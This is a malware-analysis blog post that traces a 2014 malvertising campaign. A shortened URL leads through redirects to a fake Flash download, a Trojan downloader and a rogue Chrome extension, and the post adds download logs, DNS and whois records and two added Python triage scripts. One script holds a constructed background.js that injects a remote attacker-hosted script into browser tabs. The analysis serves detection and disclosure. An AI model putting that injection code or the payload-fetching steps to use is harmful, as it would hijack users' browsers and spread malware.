I regenerated it with a separate scheme to record the log below (for the source of infection details), just to make sure that we had everything in our hands:

--2014-02-24 02:40:02--  h00p://shortening .biz/qnwr
Caching =>
Connecting to||:80... connected.
GET /qnwr HTTP/1.1
HTTP request sent, awaiting response... 
HTTP/1.1 301 Moved Permanently
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
301 Moved Permanently
Registered socket 4 for persistent reuse.
Location: [following]
Skipping 302 bytes of body: [
301 Moved Permanently
Moved Permanently
The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A)
Apache/1.3.42 Server at Port 80
] done.
--2014-02-24 02:40:03--  h00p://shortening .biz/qnwr/
GET /qnwr/ HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT
ETag: "1135-52e12d1a"
Accept-Ranges: bytes
Content-Length: 4405
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 4405 (4.3K) [text/html]
Saving to: ‘sample.mmd’
100%[=======================================================>] 4,405       --.-K/s   in 0.009s  
2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]
Back in the browser, after a short while the browser's address bar flickered to the redirection URL as shown below:

And this act is confirmed by the series of HTML meta refresh tags grepped below:

What happened next? I was forwarded to a page with a video of "a lady in the bed", as captured below:

I was just about to praise how fortunate I am.. but the video soon stopped and a warning message came up, popping the download of the Flash Player Setup.. as shown below:

The Path to Payload

Back in the shell, I simulated the download page for evidence:

And that was actually giving me the script below:

And now we know why I got that redirection: the (very bottom) link is serving the infection landing page and I was redirected into it. I will explain this later on. And there are other conditions for another redirection, for mobile access and the Opera browser, in the GOO.GL short URL. Anyway, if we extract those short URLs for mobile and the Opera browser we'll find the bigger picture:

(I will have to leave it to other friends to check those two links deeper..)
Further research on the blacklisted URL found the Amazon AWS account below abused (sorted by history) by the same threat:

And this is the malware file downloaded if you match the desired conditions:

Now this payload is well detected by the AV industry, as per the VirusTotal result shown here-->>[link]
If you run the payload you will get the HTTP query and response as follows:

And this payload downloads a "config" with info on the hash and URL of another malware, as shown here:

Here's that "guncel.exe" malware download session in my shell.. a simple wget will do.. This could be the update, or some sort of it.

This is the VirusTotal report of "guncel.exe"; it is the same file as the original payload, and it also serves as evidence explaining that the origin of the payload is (>>[link]; the detection rate as a VBA-based Trojan Downloader is not so bad after all, good work.

Below is an interesting trace of what this malware did in memory:

These are just some traces of the VBA calls used.. (during the creation of the registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload will download the background.js JavaScript from a URL planted in the binary, as per the traffic below:

The script itself is pasted here-->>[link]
↑ In that script you can clearly see the malicious traffic redirection scheme and the access URL of the landing page (the origin of the infection).

The next traffic explains how this background.js is invoked: the file manifest.json is downloaded, and it declares how background.js is executed, requesting several browser permissions for the script itself.

Can you see the effort to fake a "Google Shockwave Player" (is there any such product??) in the execution of background.js above? Things are starting to make much more sense as to why so many Google-related "images" are used here.

PS: I will add more reversing notes later on, but let's move on a bit; there is too little time, and there are more important parts to cover.

If we simulate the landing page access from a shell, what happens is something like this:

GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1
HTTP/1.1 200 OK
accept-ranges: bytes
cache-control: max-age=0
Content-Type: text/html; charset=utf-8
Date: Sun, 23 Feb 2014 21:01:55 GMT
etag: 2n
pragma: public
Server: nginx
x-dropbox-request-id: ecd60af812734360278c876a87176a00
X-RequestId: 6f612d52e7e3c0e526aa4b355328e047
x-server-response-time: 202
Content-Length: 6841
Connection: keep-alive
---response end---
200 OK
Registered socket 4 for persistent reuse.
Length: 6841 (6.7K) [text/html]
Saving to: ‘sample4.mmd’
So how did I get the payload downloaded?? Let's look at the code inside the page. Well, it seems I was hit by the timer function in this code:

The Google short URL is again being used to hide the real malware payload URL, which is served from a Google Code SVN download!!

The download log can be seen in the follow-up section.

Well, the bad guy behind this is really trying hard to convince the victim that some kind of Google application is being installed :-)

Some reversing & investigation notes

I used a recent sample from an abused Google Code SVN here:

The sample is on VT here-->[link]

Straight to the point: a reversing effort showing the CNC masked in the binary's strings:

The User Name :-))

We may need these later, so just in case, noted:

"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRD

Next, following the trail of that CnC URL to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
Look at the dates: the crook recently modified the malicious background.js script.
The background.js and manifest.json code is snipped below:

As explained way up above, the JSON is used for the execution of background.js. We didn't have a chance to disclose background.js clearly before, so here it is, a fresh one. First, the beautified full code of background.js:

If you see what I see, the attacker is aiming at the Google Chrome browser, abusing its extension API (chrome.tabs) to interact with the browser's tab system. This API can be used to create, modify, and rearrange tabs in the browser. What he did is, on the "devtools://" index/tab, program the execution of a remote script via the chrome.tabs.executeScript command, pointing to www.saatlikrapor .com/ext/s.php, which was BAD (gone now-->link and link) in . Either this crook loves Google so much or hates Google that much, since now we know he is aiming at Google Chrome end users too.
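As an added example (not code from the original post, nor the actor's own files), here is the static triage an analyst would run on an extension of this kind: it derives the extension ID Chrome computes from the manifest "key" field (SHA-256 of the key bytes, first 32 hex digits mapped onto the letters a-p), lists the broad permissions, and flags chrome.tabs.executeScript, remote script hosts, timers and the devtools:// target in background.js. The manifest.json and background.js below are constructed to match the behaviour described in the text; only the executeScript target host is taken from the post, and the key is a placeholder blob because the real key quoted above is truncated.

```python
"""Static triage of a Chrome extension of the kind dropped by the downloader above.

Added example, modelled on the behaviour the post describes; the manifest and
background.js are constructed, not the files recovered from the CnC.
"""
import base64
import hashlib
import json
import re

# --- constructed sample input ---------------------------------------------------
# A real manifest carries the DER-encoded RSA public key (SubjectPublicKeyInfo) in
# "key"; any base64 blob exercises the ID algorithm, so a placeholder stands in here.
PLACEHOLDER_KEY = base64.b64encode(bytes(range(162))).decode()

SAMPLE_MANIFEST = json.dumps({
    "name": "Google Shockwave Player",          # the fake product name noted in the post
    "version": "1.0",
    "manifest_version": 2,
    "key": PLACEHOLDER_KEY,
    "permissions": ["tabs", "http://*/*", "https://*/*"],
    "background": {"scripts": ["background.js"], "persistent": True},
})

SAMPLE_BACKGROUND_JS = r"""
// constructed; only the executeScript target host is taken from the post
chrome.tabs.onUpdated.addListener(function (tabId, info, tab) {
    if (tab.url.indexOf("devtools://") === 0) {
        chrome.tabs.executeScript(tabId, {
            code: 'var s=document.createElement("script");'
                + 's.src="http://www.saatlikrapor.com/ext/s.php";'
                + 'document.body.appendChild(s);'
        });
    }
});
setInterval(function () { /* keep-alive */ }, 60000);
"""

HEX_TO_ID = str.maketrans("0123456789abcdef", "abcdefghijklmnop")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?")
# Permissions that let an extension read or script arbitrary pages.
BROAD_PERMISSIONS = {"tabs", "<all_urls>", "http://*/*", "https://*/*", "*://*/*",
                     "webRequest", "webRequestBlocking", "debugger"}


def hex_to_ext_id(hex32: str) -> str:
    """Chrome maps the first 32 hex digits of SHA-256(key) onto the letters a-p."""
    return hex32[:32].lower().translate(HEX_TO_ID)


def extension_id_from_key(key_b64: str) -> str:
    """Extension ID as Chrome derives it from the manifest 'key' field."""
    der = base64.b64decode(key_b64)
    return hex_to_ext_id(hashlib.sha256(der).hexdigest())


def triage_manifest(manifest_json: str) -> dict:
    """Pivot points from a manifest: id, broad permissions, background scripts."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    return {
        "name": m.get("name"),
        "extension_id": extension_id_from_key(m["key"]) if "key" in m else None,
        "broad_permissions": sorted(perms & BROAD_PERMISSIONS),
        "background_scripts": m.get("background", {}).get("scripts", []),
    }


def triage_background_js(src: str) -> dict:
    """Flag remote-code behaviour in a background script."""
    return {
        "uses_execute_script": "chrome.tabs.executeScript" in src,
        "remote_hosts": sorted({re.sub(r"^https?://", "", u).split("/")[0]
                                for u in URL_RE.findall(src)}),
        "has_timer": bool(re.search(r"\bset(?:Interval|Timeout)\s*\(", src)),
        "targets_devtools": "devtools://" in src,
    }


if __name__ == "__main__":
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
    print(json.dumps(triage_background_js(SAMPLE_BACKGROUND_JS), indent=2))
```

The computed extension ID is what you would hunt for under the Chrome profile's Extensions directory on a suspected victim; the remote host list is what you would block or pivot on in proxy logs.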

PS: The domain is hidden behind Cloudflare:

;				IN	A

;; ANSWER SECTION:
		300	IN	CNAME
		300	IN	A
		300	IN	A

;; AUTHORITY SECTION:
		3600	IN	NS	""
		3600	IN	NS	""

;; ADDITIONAL SECTION:
		384	IN	A
		371	IN	A
This is the domain's registration information, a shiny brand new one:
   Registrar: DOMAINSITE, INC.
   Whois Server:
   Referral URL:
   Status: clientTransferProhibited
   Updated Date: 25-feb-2014
   Creation Date: 25-feb-2014
   Expiration Date: 25-feb-2015

Registrar: DomainSite, Inc.
Registrar IANA ID: 466
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.17202492374
Domain Status: addPeriod
Domain Status: clientTransferProhibited
Registrant Name: Whois Agent
Registrant Organization: Whois Privacy Protection Service, Inc.
And how about the CnC used? The SAME pattern! :-) behind Cloudflare:
;				IN	A

;; ANSWER SECTION:
		300	IN	A
		300	IN	A

;; AUTHORITY SECTION:
		3600	IN	NS	""
		3600	IN	NS	""

;; ADDITIONAL SECTION:
		3462	IN	A
		3483	IN	A
And with the registration details below:
   Whois Server:
   Referral URL:
   Status: ok
   Updated Date: 12-jan-2014
   Creation Date: 07-jun-2013
   Expiration Date: 07-jun-2014
We will have to work with Turkish law enforcement to nail this guy for good:
CREATE DATE: 6/7/2013 11:59:57 AM
UPDATED DATE: 1/12/2014 3:25:26 PM
EXPIRATION DATE: 6/7/2014 11:59:57 AM

owner-organization:Whois Privacy Protection Service.
No, no, it is NOT a hacking site (please don't give me that preach):
$ curl
$ curl
$ date
Fri Feb 28 10:10:36 JST 2014


The domain WJETPHP.COM, which was mentioned in the top section as the "payload center" (read: CNC), is also still alive now, with the details below:

$ dig WJETPHP.COM any

; <<>> DiG 9.8.5-P1 <<>> WJETPHP.COM any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 542
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 0


WJETPHP.COM.  21599 IN NS mary.ns.cloudflare.COM.
WJETPHP.COM.  21599 IN NS todd.ns.cloudflare.COM.
WJETPHP.COM.  21599 IN SOA mary.ns.cloudflare.COM. dns.cloudflare.COM. 2014501676 10000 2400 604800 3600

;; Query time: 277 msec
;; WHEN: Sun Mar 09 04:12:37 JST 2014
;; MSG SIZE  rcvd: 137
As you can see, he is still hiding his service behind Cloudflare (read: he is a Cloudflare customer).

Moreover, the ownership of the domain:

Domain Name: WJETPHP.COM
Registrar: FBS INC.
Whois Server:
Referral URL:
Status: clientTransferProhibited
Updated Date: 01-feb-2014
Creation Date: 24-may-2013
Expiration Date: 24-may-2014
>>> Last update of whois database: Sat, 08 Mar 2014 19:17:39 UTC <<<

Domain Name: WJETPHP.COM
Registry Domain ID:
Registrar WHOIS Server:
Registrar URL:
Updated Date: 24-Jul-2013
Creation Date: 24-May-2013
Registrar Registration Expiration Date: 24-May-2014
Registrar: FBS Inc.
Registrar IANA ID: 1110
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +902163299393
Domain Status: clientTransferProhibited

URL of the ICANN WHOIS Data Problem Reporting System:
>>>Last update of WHOIS database: 2014-03-08T19:18:12+0000Z<<<
Registration Service Provided By: WWW.ISIMTESCIL.NET
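As an added example (not from the original post), the two checks made by hand above as a small script: parse dig output for the nameservers and decide whether a domain is fronted by Cloudflare (every NS under ns.cloudflare.com, so the origin IP is hidden), and parse the whois "Creation Date" to compute how old the registration was on the day it was observed. The sample inputs are reconstructed from the records quoted above; the redacted landing domain is stood in for by the placeholder REDACTED.EXAMPLE, and the 30-day "fresh registration" threshold is an assumption.

```python
"""Infrastructure triage for the domains in this post: Cloudflare fronting and
registration age. Added example; sample inputs are modelled on the dig and whois
output quoted in the post (the landing domain's name is redacted there)."""
import re
from datetime import date

# --- constructed sample inputs, reconstructed from the records quoted above ------
DIG_WJETPHP = """
WJETPHP.COM.  21599 IN NS mary.ns.cloudflare.COM.
WJETPHP.COM.  21599 IN NS todd.ns.cloudflare.COM.
WJETPHP.COM.  21599 IN SOA mary.ns.cloudflare.COM. dns.cloudflare.COM. 2014501676 10000 2400 604800 3600
"""
WHOIS_WJETPHP = """
   Registrar: FBS INC.
   Status: clientTransferProhibited
   Updated Date: 01-feb-2014
   Creation Date: 24-may-2013
   Expiration Date: 24-may-2014
"""
WHOIS_LANDING = """
   Registrar: DOMAINSITE, INC.
   Creation Date: 25-feb-2014
   Expiration Date: 25-feb-2015
"""

MONTHS = {m: i for i, m in enumerate(
    ["jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec"], 1)}
NS_RE = re.compile(r"^\S+\s+\d+\s+IN\s+NS\s+(\S+)", re.MULTILINE | re.IGNORECASE)
# Registry whois writes "24-may-2013"; the registrar whois on this page writes "24-May-2013".
DATE_RE = re.compile(r"Creation Date:\s*(\d{1,2})-([A-Za-z]{3})-(\d{4})", re.IGNORECASE)


def nameservers(dig_text: str) -> list:
    """Nameserver hostnames from dig output, lower-cased, trailing dot removed."""
    return sorted(ns.lower().rstrip(".") for ns in NS_RE.findall(dig_text))


def fronted_by_cloudflare(dig_text: str):
    """True when every NS is under ns.cloudflare.com; None if no NS records were given."""
    ns = nameservers(dig_text)
    if not ns:
        return None  # e.g. redacted output: cannot tell
    return all(n.endswith(".ns.cloudflare.com") for n in ns)


def creation_date(whois_text: str) -> date:
    """Parse the dd-mon-yyyy 'Creation Date' line used by the whois output above."""
    m = DATE_RE.search(whois_text)
    if not m:
        raise ValueError("no Creation Date in whois text")
    day, mon, year = m.groups()
    return date(int(year), MONTHS[mon.lower()], int(day))


def domain_age_days(whois_text: str, observed_iso: str) -> int:
    """Age of the registration, in days, on the day the infrastructure was observed."""
    return (date.fromisoformat(observed_iso) - creation_date(whois_text)).days


def triage(name: str, dig_text: str, whois_text: str, observed_iso: str) -> dict:
    age = domain_age_days(whois_text, observed_iso)
    return {
        "domain": name,
        "cloudflare_fronted": fronted_by_cloudflare(dig_text),
        "age_days": age,
        "fresh_registration": age < 30,   # threshold is an analyst's choice (assumption)
    }


if __name__ == "__main__":
    # WJETPHP.COM as observed in the dig run dated 09 Mar 2014 above
    print(triage("WJETPHP.COM", DIG_WJETPHP, WHOIS_WJETPHP, "2014-03-09"))
    # the landing domain, observed 28 Feb 2014; its dig output is redacted on the page
    print(triage("REDACTED.EXAMPLE", "", WHOIS_LANDING, "2014-02-28"))
```

A registration that is three days old and already serving a landing page behind a CDN is the combination worth alerting on; the age check is cheap to add to any domain enrichment step in an IR pipeline.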


How to conclude this matter generally? Obviously, well-known public internet services were targeted to spread this infection. Let me describe how many abused services were spotted in this single case:
Number one: (property of Amazon AWS) is utilised by this actor for the bad scheme (see the mobile link and the Opera browser link in the explanation above; whatever it is, it is not a good thing). We had better warn Amazon AWS about this link.
Number two: (property of Dropbox, Inc) is also utilised to serve the malware payload.
Is that all? No. Number three: see the domain in the payload URL,, it is an abuse of Google Code's SVN facility.
More? Yes, the last one, number four: the service, Google's short URL, is also abused to hide the URL of the malware payload.

Google Code has been abused to serve malware payloads for this threat series for quite a while; you can view the reports posted by our friend @sarimura (twitter) to the Project Hosting on Google Code group in Google Groups-->[here]. It shows how persistent the malware actor is in always creating a new Google Code project and using its download URL to serve the malware payloads. On the other hand, it shows that the bad actor(s) leave many traces on Google Code's servers while uploading the payloads (account ID, IP addresses, etc.), a hint to follow, isn't it?


I am sharing all samples, under the usual password; click the picture below to download:

Moral of the story: our beloved internet and its services are badly abused by malware. Please stay safe!
PS: Comments and additions will be added in the follow-up section! And it looks like this threat is bigger than expected, so I couldn't sleep again; gotta go to my day job now!

Updates: How bad is the abuse and this malvertisement?

The bad actor keeps changing users on Amazon AWS and Google Code to serve the next malicious payload. The newly abused Amazon AWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google put a good workaround in place, a 401 authentication response:

Or a 403:

Now Emerging Threats has released a signature that can be used to identify this malware download:

Update info credit: @sarimura (twitter); signature: Emerging Threats & @node5 (twitter); tests & checks: @urlquery (twitter); thanks to Google for continuing to nuke the bad accounts, and for the nice stats of the short URL.

Follow Up

Great follow-up, thanks for always being fast in responding!